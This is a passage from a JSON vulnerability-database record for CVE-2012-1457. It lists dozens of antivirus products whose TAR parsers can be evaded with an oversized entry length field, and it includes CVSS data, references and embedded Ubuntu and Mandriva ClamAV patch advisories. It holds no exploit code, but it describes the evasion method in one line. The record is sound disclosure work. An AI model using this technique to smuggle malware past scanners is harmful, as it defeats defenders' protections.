0.8, "vendor": "rising", "version": "22.83.00.03" }, { "model": "nod32 anti-virus", "scope": "eq", "trust": 0.8, "vendor": "eset", "version": "5795" }, { "model": "f-prot antivirus", "scope": "eq", "trust": 0.8, "vendor": "frisk", "version": "4.6.2.117" }, { "model": "antivirus", "scope": "eq", "trust": 0.8, "vendor": "g data", "version": "21" }, { "model": "antivirus", "scope": "eq", "trust": 0.8, "vendor": "k7 computing", "version": "9.77.3565" }, { "model": "antivirus", "scope": "eq", "trust": 0.8, "vendor": "norman", "version": "6.06.12" }, { "model": "vba32", "scope": "eq", "trust": 0.8, "vendor": "virusblokada", "version": "3.12.14.2" }, { "model": "heal", "scope": "eq", "trust": 0.8, "vendor": "quick heal k k", "version": "11.00" }, { "model": "endpoint protection", "scope": "eq", "trust": 0.8, "vendor": "symantec", "version": "11" }, { "model": "antivirus", "scope": "eq", "trust": 0.8, "vendor": "trend micro", "version": "9.120.0.1004" }, { "model": "housecall", "scope": "eq", "trust": 0.8, "vendor": "trend micro", "version": "9.120.0.1004" }, { "model": "web gateway software", "scope": "eq", "trust": 0.8, "vendor": "mcafee", "version": "2010.1c" }, { "model": "vba32", "scope": "eq", "trust": 0.3, "vendor": "virusblokada", "version": "3.12.142" }, { "model": "linux lts i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "linux lts amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "11.10" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "11.10" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "11.04" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "11.04" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "11.04" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "11.04" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "virusbuster", "scope": "eq", "trust": 0.3, "vendor": "trend micro", "version": "13.6.1510" }, { "model": "trend micro", "scope": "eq", "trust": 0.3, "vendor": "trend micro", "version": "9.1201004" }, { "model": "housecall", "scope": "eq", "trust": 0.3, "vendor": "trend micro", "version": "9.1201004" }, { "model": "antivirus", "scope": "eq", "trust": 0.3, "vendor": "symantec", "version": "20101.3103" }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "12.1" }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11.4" }, { "model": "antivirus", "scope": "eq", "trust": 0.3, "vendor": "rising", "version": "22.8303" }, { "model": "cat-quickheal", "scope": "eq", "trust": 0.3, "vendor": "quick heal", "version": "11.00" }, { "model": "antivirus", "scope": "eq", "trust": 0.3, "vendor": "pctools", "version": "7.0.35" }, { "model": "antivirus", "scope": "eq", "trust": 0.3, "vendor": "norman", "version": "6.6.12" }, { "model": "antivirus", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "1.6402" }, { "model": "mcafee-gw-edition 2010.1c", "scope": null, "trust": 0.3, "vendor": "mcafee", "version": null }, { "model": "enterprise server x86 64", "scope": "eq", "trust": 0.3, "vendor": "mandrakesoft", "version": "5" }, { "model": "enterprise server", "scope": "eq", "trust": 0.3, "vendor": "mandrakesoft", "version": "5" }, { "model": "antivirus", "scope": "eq", "trust": 0.3, "vendor": "kaspersky", "version": "7.0125" }, { "model": "computing pvt ltd k7antivirus", "scope": "eq", "trust": 0.3, "vendor": "k7", "version": "9.77.3565" }, { "model": "jiangmin", "scope": "eq", "trust": 0.3, "vendor": "jiangmin", "version": "13.0.900" }, { "model": "antivirus t3.1.1.97.0", "scope": null, "trust": 0.3, "vendor": "ikarus", "version": null }, { "model": "data software gdata", "scope": "eq", "trust": 0.3, "vendor": "g", "version": "21" }, { "model": "software f-prot antivirus", "scope": "eq", "trust": 0.3, "vendor": "frisk", "version": "4.6.2117" }, { "model": "nod32", "scope": "eq", "trust": 0.3, "vendor": "eset", "version": "5795" }, { "model": "antivirus", "scope": "eq", "trust": 0.3, "vendor": "esafe", "version": "7.0.170" }, { "model": "antivirus", "scope": "eq", "trust": 0.3, "vendor": "emsisoft", "version": "5.11" }, { "model": "antivirus", "scope": "eq", "trust": 0.3, "vendor": "bitdefender", "version": "7.2" }, { "model": "antivir engine", "scope": "eq", "trust": 0.3, "vendor": "avira", "version": "7.11.1163" }, { "model": "anti-virus", "scope": "eq", "trust": 0.3, "vendor": "avg", "version": "10.01190" }, { "model": "avast5 antivirus", "scope": "eq", "trust": 0.3, "vendor": "avast", "version": "5.0.6770" }, { "model": "antivirus", "scope": "eq", "trust": 0.3, "vendor": "avast", "version": "4.8.1351.0" }, { "model": "command antivirus", "scope": "eq", "trust": 0.3, "vendor": "authentium", "version": "5.2.115" }, { "model": "antiy-avl", "scope": "eq", "trust": 0.3, "vendor": "antiy", "version": "2.0.37" } ], "sources": [ { "db": "BID", "id": "52610" }, { "db": "JVNDB", "id": "JVNDB-2012-001902" }, { "db": "CNNVD", "id": "CNNVD-201203-420" }, { "db": "NVD", "id": "CVE-2012-1457" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:antiy:avl_sdk", "vulnerable": true }, { "cpe22Uri": "cpe:/a:authentium:command_antivirus", "vulnerable": true }, { "cpe22Uri": "cpe:/a:avast:avast_antivirus", "vulnerable": true }, { "cpe22Uri": "cpe:/a:avg:avg_anti-virus", "vulnerable": true }, { "cpe22Uri": "cpe:/a:avira:antivirus", "vulnerable": true }, { "cpe22Uri": "cpe:/a:rising-global:rising_antivirus", "vulnerable": true }, { "cpe22Uri": "cpe:/a:bitdefender:bitdefender", "vulnerable": true }, { "cpe22Uri": "cpe:/a:clamav:clamav", "vulnerable": true }, { "cpe22Uri": "cpe:/a:emsisoft:anti-malware", "vulnerable": true }, { "cpe22Uri": "cpe:/a:eset:nod32_antivirus", "vulnerable": true }, { "cpe22Uri": "cpe:/a:f-prot:f-prot_antivirus", "vulnerable": true }, { "cpe22Uri": "cpe:/a:gdata-software:g_data_antivirus", "vulnerable": true }, { "cpe22Uri": "cpe:/a:ikarus:ikarus_virus_utilities_t3_command_line_scanner", "vulnerable": true }, { "cpe22Uri": "cpe:/a:jiangmin:jiangmin_antivirus", "vulnerable": true }, { "cpe22Uri": "cpe:/a:k7computing:antivirus", "vulnerable": true }, { "cpe22Uri": "cpe:/a:norman:norman_antivirus_%26_antispyware", "vulnerable": true }, { "cpe22Uri": "cpe:/a:pc_tools:pc_tools_antivirus", "vulnerable": true }, { "cpe22Uri": "cpe:/a:anti-virus:vba32", "vulnerable": true }, { "cpe22Uri": "cpe:/a:virusbuster:virusbuster", "vulnerable": true }, { "cpe22Uri": "cpe:/a:aladdin:esafe", "vulnerable": true }, { "cpe22Uri": "cpe:/a:kaspersky:kaspersky_anti-virus", "vulnerable": true }, { "cpe22Uri": "cpe:/a:quick_heal:quick_heal", "vulnerable": true }, { "cpe22Uri": "cpe:/a:symantec:endpoint_protection", "vulnerable": true }, { "cpe22Uri": "cpe:/a:trendmicro:trend_micro_antivirus", "vulnerable": true }, { "cpe22Uri": "cpe:/a:trendmicro:housecall", "vulnerable": true }, { "cpe22Uri": "cpe:/a:microsoft:security_essentials", "vulnerable": true }, { "cpe22Uri": "cpe:/a:mcafee:scan_engine", "vulnerable": true }, { "cpe22Uri": "cpe:/a:mcafee:web_gateway", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2012-001902" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Suman Jana and Vitaly Shmatikov", "sources": [ { "db": "BID", "id": "52610" } ], "trust": 0.3 }, "cve": "CVE-2012-1457", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "exploitabilityScore": 8.6, "id": "CVE-2012-1457", "impactScore": 2.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "exploitabilityScore": 8.6, "id": "VHN-54738", "impactScore": 2.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2012-1457", "trust": 1.0, "value": "MEDIUM" }, { "author": "NVD", "id": "CVE-2012-1457", "trust": 0.8, "value": "Medium" }, { "author": "CNNVD", "id": "CNNVD-201203-420", "trust": 0.6, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-54738", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULHUB", "id": "VHN-54738" }, { "db": "JVNDB", "id": "JVNDB-2012-001902" }, { "db": "CNNVD", "id": "CNNVD-201203-420" }, { "db": "NVD", "id": "CVE-2012-1457" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The TAR file parser in Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK 2.0.3.7, avast! Antivirus 4.8.1351.0 and 5.0.677.0, AVG Anti-Virus 10.0.0.1190, Bitdefender 7.2, Quick Heal (aka Cat QuickHeal) 11.00, ClamAV 0.96.4, Command Antivirus 5.2.11.5, Emsisoft Anti-Malware 5.1.0.1, eSafe 7.0.17.0, F-Prot Antivirus 4.6.2.117, G Data AntiVirus 21, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Jiangmin Antivirus 13.0.900, K7 AntiVirus 9.77.3565, Kaspersky Anti-Virus 7.0.0.125, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, PC Tools AntiVirus 7.0.3.5, Rising Antivirus 22.83.00.03, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Trend Micro AntiVirus 9.120.0.1004, Trend Micro HouseCall 9.120.0.1004, VBA32 3.12.14.2, and VirusBuster 13.6.151.0 allows remote attackers to bypass malware detection via a TAR archive entry with a length field that exceeds the total TAR file size. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations. Multiple products TAR A file parser contains a vulnerability that can prevent malware detection. Different TAR If it is announced that there is also a problem with the parser implementation, this vulnerability can be CVE May be split.By a third party TAR Total file size exceeded length With field TAR Malware detection can be bypassed via archive entries. \nSuccessful exploits will allow attackers to bypass on-demand virus scanning, possibly allowing malicious files to escape detection. Vulnerabilities exist in the TAR file parser in version 1004, Trend Micro HouseCall version 9.120.0.1004, VBA32 version 3.12.14.2, and VirusBuster version 13.6.151.0. ============================================================================\nUbuntu Security Notice USN-1482-1\nJune 19, 2012\n\nclamav vulnerabilities\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 12.04 LTS\n- Ubuntu 11.10\n- Ubuntu 11.04\n- Ubuntu 10.04 LTS\n\nSummary:\n\nClamAV could improperly detect malware if it opened a specially crafted\nfile. \n\nSoftware Description:\n- clamav: Anti-virus utility for Unix\n\nDetails:\n\nIt was discovered that ClamAV incorrectly handled certain malformed TAR\narchives. (CVE-2012-1457,\nCVE-2012-1459)\n\nIt was discovered that ClamAV incorrectly handled certain malformed CHM\nfiles. (CVE-2012-1458)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 12.04 LTS:\n clamav 0.97.5+dfsg-1ubuntu0.12.04.1\n clamav-daemon 0.97.5+dfsg-1ubuntu0.12.04.1\n libclamav6 0.97.5+dfsg-1ubuntu0.12.04.1\n\nUbuntu 11.10:\n clamav 0.97.5+dfsg-1ubuntu0.11.10.1\n clamav-daemon 0.97.5+dfsg-1ubuntu0.11.10.1\n libclamav6 0.97.5+dfsg-1ubuntu0.11.10.1\n\nUbuntu 11.04:\n clamav 0.97.5+dfsg-1ubuntu0.11.04.1\n clamav-daemon 0.97.5+dfsg-1ubuntu0.11.04.1\n libclamav6 0.97.5+dfsg-1ubuntu0.11.04.1\n\nUbuntu 10.04 LTS:\n clamav 0.96.5+dfsg-1ubuntu1.10.04.4\n clamav-daemon 0.96.5+dfsg-1ubuntu1.10.04.4\n libclamav6 0.96.5+dfsg-1ubuntu1.10.04.4\n\nIn general, a standard system update will make all the necessary changes. \n\nReferences:\n http://www.ubuntu.com/usn/usn-1482-1\n CVE-2012-1457, CVE-2012-1458, CVE-2012-1459\n\nPackage Information:\n https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.12.04.1\n https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.11.10.1\n https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.11.04.1\n https://launchpad.net/ubuntu/+source/clamav/0.96.5+dfsg-1ubuntu1.10.04.4\n. \n \n The Microsoft CHM file parser in ClamAV 0.96.4 allows remote attackers\n to bypass malware detection via a crafted reset interval in the LZXC\n header of a CHM file. \n _______________________________________________________________________\n\n References:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1457\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1458\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1459\n http://git.clamav.net/gitweb?p=clamav-devel.git;a=blob_plain;f=ChangeLog;hb=clamav-0.97.5\n _______________________________________________________________________\n\n Updated Packages:\n\n Mandriva Enterprise Server 5:\n d82d78601290e2f6073974170c81841a mes5/i586/clamav-0.97.5-0.1mdvmes5.2.i586.rpm\n 80f0475472c0217afd3727019bf27e53 mes5/i586/clamav-db-0.97.5-0.1mdvmes5.2.i586.rpm\n c13835eadea8d2af15b628fba3159e8b mes5/i586/clamav-milter-0.97.5-0.1mdvmes5.2.i586.rpm\n d7c058fae32f1a081b1d4ca31157df0e mes5/i586/clamd-0.97.5-0.1mdvmes5.2.i586.rpm\n 5ad153709c7eb510c2be2e82bfa5ac52 mes5/i586/libclamav6-0.97.5-0.1mdvmes5.2.i586.rpm\n 96e3d3f3e9bea802c4109c155c9d1465 mes5/i586/libclamav-devel-0.97.5-0.1mdvmes5.2.i586.rpm \n 203cde43731b63729d1f7f6497033184 mes5/SRPMS/clamav-0.97.5-0.1mdvmes5.2.src.rpm\n\n Mandriva Enterprise Server 5/X86_64:\n b30f5aafd9aaff0a7743fb62f33ccbea mes5/x86_64/clamav-0.97.5-0.1mdvmes5.2.x86_64.rpm\n 1508801239427c0ac72734f52cb4451c mes5/x86_64/clamav-db-0.97.5-0.1mdvmes5.2.x86_64.rpm\n 92b4c5ca6db656801b5b6ae217c6e171 mes5/x86_64/clamav-milter-0.97.5-0.1mdvmes5.2.x86_64.rpm\n 94fad12df2cc900309087bbda13c826a mes5/x86_64/clamd-0.97.5-0.1mdvmes5.2.x86_64.rpm\n 8ec166a457d0512479adaaf5f80d487f mes5/x86_64/lib64clamav6-0.97.5-0.1mdvmes5.2.x86_64.rpm\n 19bc2758175bcde28ebf7783d68a9b98 mes5/x86_64/lib64clamav-devel-0.97.5-0.1mdvmes5.2.x86_64.rpm \n 203cde43731b63729d1f7f6497033184 mes5/SRPMS/clamav-0.97.5-0.1mdvmes5.2.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\n of md5 checksums and GPG signatures is performed automatically for you. \n\n All packages are signed by Mandriva for security. You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n http://www.mandriva.com/security/advisories\n\n If you want to report vulnerabilities, please contact\n\n security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID Date User ID\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\n \u003csecurity*mandriva.com\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.11 (GNU/Linux)\n\niD8DBQFP3tnKmqjQ0CJFipgRAj4wAJ9eURS1mZYCZhkmUTVE/U8QAH47MwCgxQzf\nOUr1QL5Wsvt3KboLKCdYUhE=\n=1QL7\n-----END PGP SIGNATURE-----\n", "sources": [ { "db": "NVD", "id": "CVE-2012-1457" }, { "db": "JVNDB", "id": "JVNDB-2012-001902" }, { "db": "BID", "id": "52610" }, { "db": "VULHUB", "id": "VHN-54738" }, { "db": "PACKETSTORM", "id": "113878" }, { "db": "PACKETSTORM", "id": "113841" } ], "trust": 2.16 }, "exploit_availability": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "reference": "https://www.scap.org.cn/vuln/vhn-54738", "trust": 0.1, "type": "unknown" } ], "sources": [ { "db": "VULHUB", "id": "VHN-54738" } ] }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2012-1457", "trust": 3.0 }, { "db": "BID", "id": "52610", "trust": 1.4 }, { "db": "OSVDB", "id": "80392", "trust": 1.1 }, { "db": "OSVDB", "id": "80406", "trust": 1.1 }, { "db": "OSVDB", "id": "80391", "trust": 1.1 }, { "db": "OSVDB", "id": "80407", "trust": 1.1 }, { "db": "OSVDB", "id": "80396", "trust": 1.1 }, { "db": "OSVDB", "id": "80395", "trust": 1.1 }, { "db": "OSVDB", "id": "80403", "trust": 1.1 }, { "db": "OSVDB", "id": "80409", "trust": 1.1 }, { "db": "OSVDB", "id": "80389", "trust": 1.1 }, { "db": "OSVDB", "id": "80393", "trust": 1.1 }, { "db": "JVNDB", "id": "JVNDB-2012-001902", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201203-420", "trust": 0.7 }, { "db": "BUGTRAQ", "id": "20120319 EVASION ATTACKS EXPOLITING FILE-PARSING VULNERABILITIES IN ANTIVIRUS PRODUCTS", "trust": 0.6 }, { "db": "NSFOCUS", "id": "19229", "trust": 0.6 }, { "db": "PACKETSTORM", "id": "113841", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-54738", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "113878", "trust": 0.1 } ], "sources": [ { "db": "VULHUB", "id": "VHN-54738" }, { "db": "BID", "id": "52610" }, { "db": "JVNDB", "id": "JVNDB-2012-001902" }, { "db": "PACKETSTORM", "id": "113878" }, { "db": "PACKETSTORM", "id": "113841" }, { "db": "CNNVD", "id": "CNNVD-201203-420" }, { "db": "NVD", "id": "CVE-2012-1457" } ] }, "id": "VAR-201203-0381", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VULHUB", "id": "VHN-54738" } ], "trust": 0.01 }, "last_update_date": "2024-11-23T21:46:23.996000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Top Page", "trust": 0.8, "url": "http://www.aladdin.com/" }, { "title": "Top Page", "trust": 0.8, "url": "http://www.antiy.net/" }, { "title": "Top Page", "trust": 0.8, "url": "http://www.authentium.com/" }, { "title": "Top Page", "trust": 0.8, "url": "https://www.avast.com/index" }, { "title": "Top Page", "trust": 0.8, "url": "http://www.avg.com/" }, { "title": "Top Page", "trust": 0.8, "url": "http://www.avira.com/" }, { "title": "Top Page", "trust": 0.8, "url": "http://www.rising-global.com/" }, { "title": "Top Page", "trust": 0.8, "url": "http://www.bitdefender.com/" }, { "title": "Top Page", "trust": 0.8, "url": "http://www.clamav.net/" }, { "title": "Top Page", "trust": 0.8, "url": "http://www.emsisoft.com/" }, { "title": "Top Page", "trust": 0.8, "url": "http://www.eset.com/" }, { "title": "Top Page", "trust": 0.8, "url": "http://www.f-prot.com/" }, { "title": "Top Page", "trust": 0.8, "url": "http://www.gdata-software.com/" }, { "title": "Top Page", "trust": 0.8, "url": "http://www.ikarus.at/" }, { "title": "Top Page", "trust": 0.8, "url": "http://global.jiangmin.com/" }, { "title": "Top Page", "trust": 0.8, "url": "http://www.k7computing.com/" }, { "title": "Top Page", "trust": 0.8, "url": "http://www.mcafee.com/" }, { "title": "Top Page", "trust": 0.8, "url": "http://www.microsoft.com/" }, { "title": "Top Page", "trust": 0.8, "url": "http://www.norman.com/" }, { "title": "openSUSE-SU-2012:0833", "trust": 0.8, "url": "http://lists.opensuse.org/opensuse-security-announce/2012-07/msg00002.html" }, { "title": "Top Page", "trust": 0.8, "url": "http://www.pctools.com/" }, { "title": "Top Page", "trust": 0.8, "url": "http://www.quickheal.com/" }, { "title": "Top Page", "trust": 0.8, "url": "http://www.symantec.com/" }, { "title": "Top Page", "trust": 0.8, "url": "http://www.trendmicro.com/" }, { "title": "Top Page", "trust": 0.8, "url": "http://anti-virus.by/en/" }, { "title": "Top Page", "trust": 0.8, "url": "http://www.virusbuster.hu/en/" }, { "title": "Top Page", "trust": 0.8, "url": "http://www.kaspersky.com/" } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2012-001902" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-264", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-54738" }, { "db": "JVNDB", "id": "JVNDB-2012-001902" }, { "db": "NVD", "id": "CVE-2012-1457" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.7, "url": "http://www.securityfocus.com/archive/1/522005" }, { "trust": 1.7, "url": "http://www.ieee-security.org/tc/sp2012/program.html" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/52610" }, { "trust": 1.1, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2012:094" }, { "trust": 1.1, "url": "http://osvdb.org/80389" }, { "trust": 1.1, "url": "http://osvdb.org/80391" }, { "trust": 1.1, "url": "http://osvdb.org/80392" }, { "trust": 1.1, "url": "http://osvdb.org/80393" }, { "trust": 1.1, "url": "http://osvdb.org/80395" }, { "trust": 1.1, "url": "http://osvdb.org/80396" }, { "trust": 1.1, "url": "http://osvdb.org/80403" }, { "trust": 1.1, "url": "http://osvdb.org/80406" }, { "trust": 1.1, "url": "http://osvdb.org/80407" }, { "trust": 1.1, "url": "http://osvdb.org/80409" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2012-07/msg00002.html" }, { "trust": 1.1, "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/74293" }, { "trust": 0.9, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1457" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2012-1457" }, { "trust": 0.6, "url": "http://www.nsfocus.net/vulndb/19229" }, { "trust": 0.3, "url": "http://www.antiy.net" }, { "trust": 0.3, "url": "http://www.authentium.com" }, { "trust": 0.3, "url": "http://www.avast.com" }, { "trust": 0.3, "url": "http://www.avg.com" }, { "trust": 0.3, "url": "http://www.avira.com/" }, { "trust": 0.3, "url": "http://www.bitdefender.com" }, { "trust": 0.3, "url": "http://www.emsisoft.com/en/software/antimalware/" }, { "trust": 0.3, "url": "http://www.safenet-inc.com/data-protection/content-security-esafe/" }, { "trust": 0.3, "url": "http://eset.com" }, { "trust": 0.3, "url": "http://www.f-prot.com/" }, { "trust": 0.3, "url": "http://www.gdatasoftware.com" }, { "trust": 0.3, "url": "http://www.ikarus.at" }, { "trust": 0.3, "url": "http://global.jiangmin.com/" }, { "trust": 0.3, "url": "http://www.k7computing.com/en/product/k7-antivirusplus.php" }, { "trust": 0.3, "url": "http://www.kaspersky.com/" }, { "trust": 0.3, "url": "http://www.mcafee.com/" }, { "trust": 0.3, "url": "http://www.microsoft.com" }, { "trust": 0.3, "url": "http://anti-virus-software-review.toptenreviews.com/norman-review.html" }, { "trust": 0.3, "url": "http://www.pctools.com/spyware-doctor-antivirus/" }, { "trust": 0.3, "url": "http://www.quickheal.com/" }, { "trust": 0.3, "url": "http://www.rising-global.com/" }, { "trust": 0.3, "url": "http://www.symantec.com" }, { "trust": 0.3, "url": "http://www.trend.com" }, { "trust": 0.3, "url": "http://anti-virus.by/en/index.shtml" }, { "trust": 0.3, "url": "/archive/1/522005" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1457" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1459" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1458" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/clamav/0.96.5+dfsg-1ubuntu1.10.04.4" }, { "trust": 0.1, "url": "http://www.ubuntu.com/usn/usn-1482-1" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.11.10.1" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.12.04.1" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.11.04.1" }, { "trust": 0.1, "url": "http://www.mandriva.com/security/" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1459" }, { "trust": 0.1, "url": "http://www.mandriva.com/security/advisories" }, { "trust": 0.1, "url": "http://git.clamav.net/gitweb?p=clamav-devel.git;a=blob_plain;f=changelog;hb=clamav-0.97.5" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1458" } ], "sources": [ { "db": "VULHUB", "id": "VHN-54738" }, { "db": "BID", "id": "52610" }, { "db": "JVNDB", "id": "JVNDB-2012-001902" }, { "db": "PACKETSTORM", "id": "113878" }, { "db": "PACKETSTORM", "id": "113841" }, { "db": "CNNVD", "id": "CNNVD-201203-420" }, { "db": "NVD", "id": "CVE-2012-1457" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULHUB", "id": "VHN-54738" }, { "db": "BID", "id": "52610" }, { "db": "JVNDB", "id": "JVNDB-2012-001902" }, { "db": "PACKETSTORM", "id": "113878" }, { "db": "PACKETSTORM", "id": "113841" }, { "db": "CNNVD", "id": "CNNVD-201203-420" }, { "db": "NVD", "id": "CVE-2012-1457" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2012-03-21T00:00:00", "db": "VULHUB", "id": "VHN-54738" }, { "date": "2012-03-20T00:00:00", "db": "BID", "id": "52610" }, { "date": "2012-03-26T00:00:00", "db": "JVNDB", "id": "JVNDB-2012-001902" }, { "date": "2012-06-20T02:54:11", "db": "PACKETSTORM", "id": "113878" }, { "date": "2012-06-19T00:56:02", "db": "PACKETSTORM", "id": "113841" }, { "date": "2012-03-26T00:00:00", "db": "CNNVD", "id": "CNNVD-201203-420" }, { 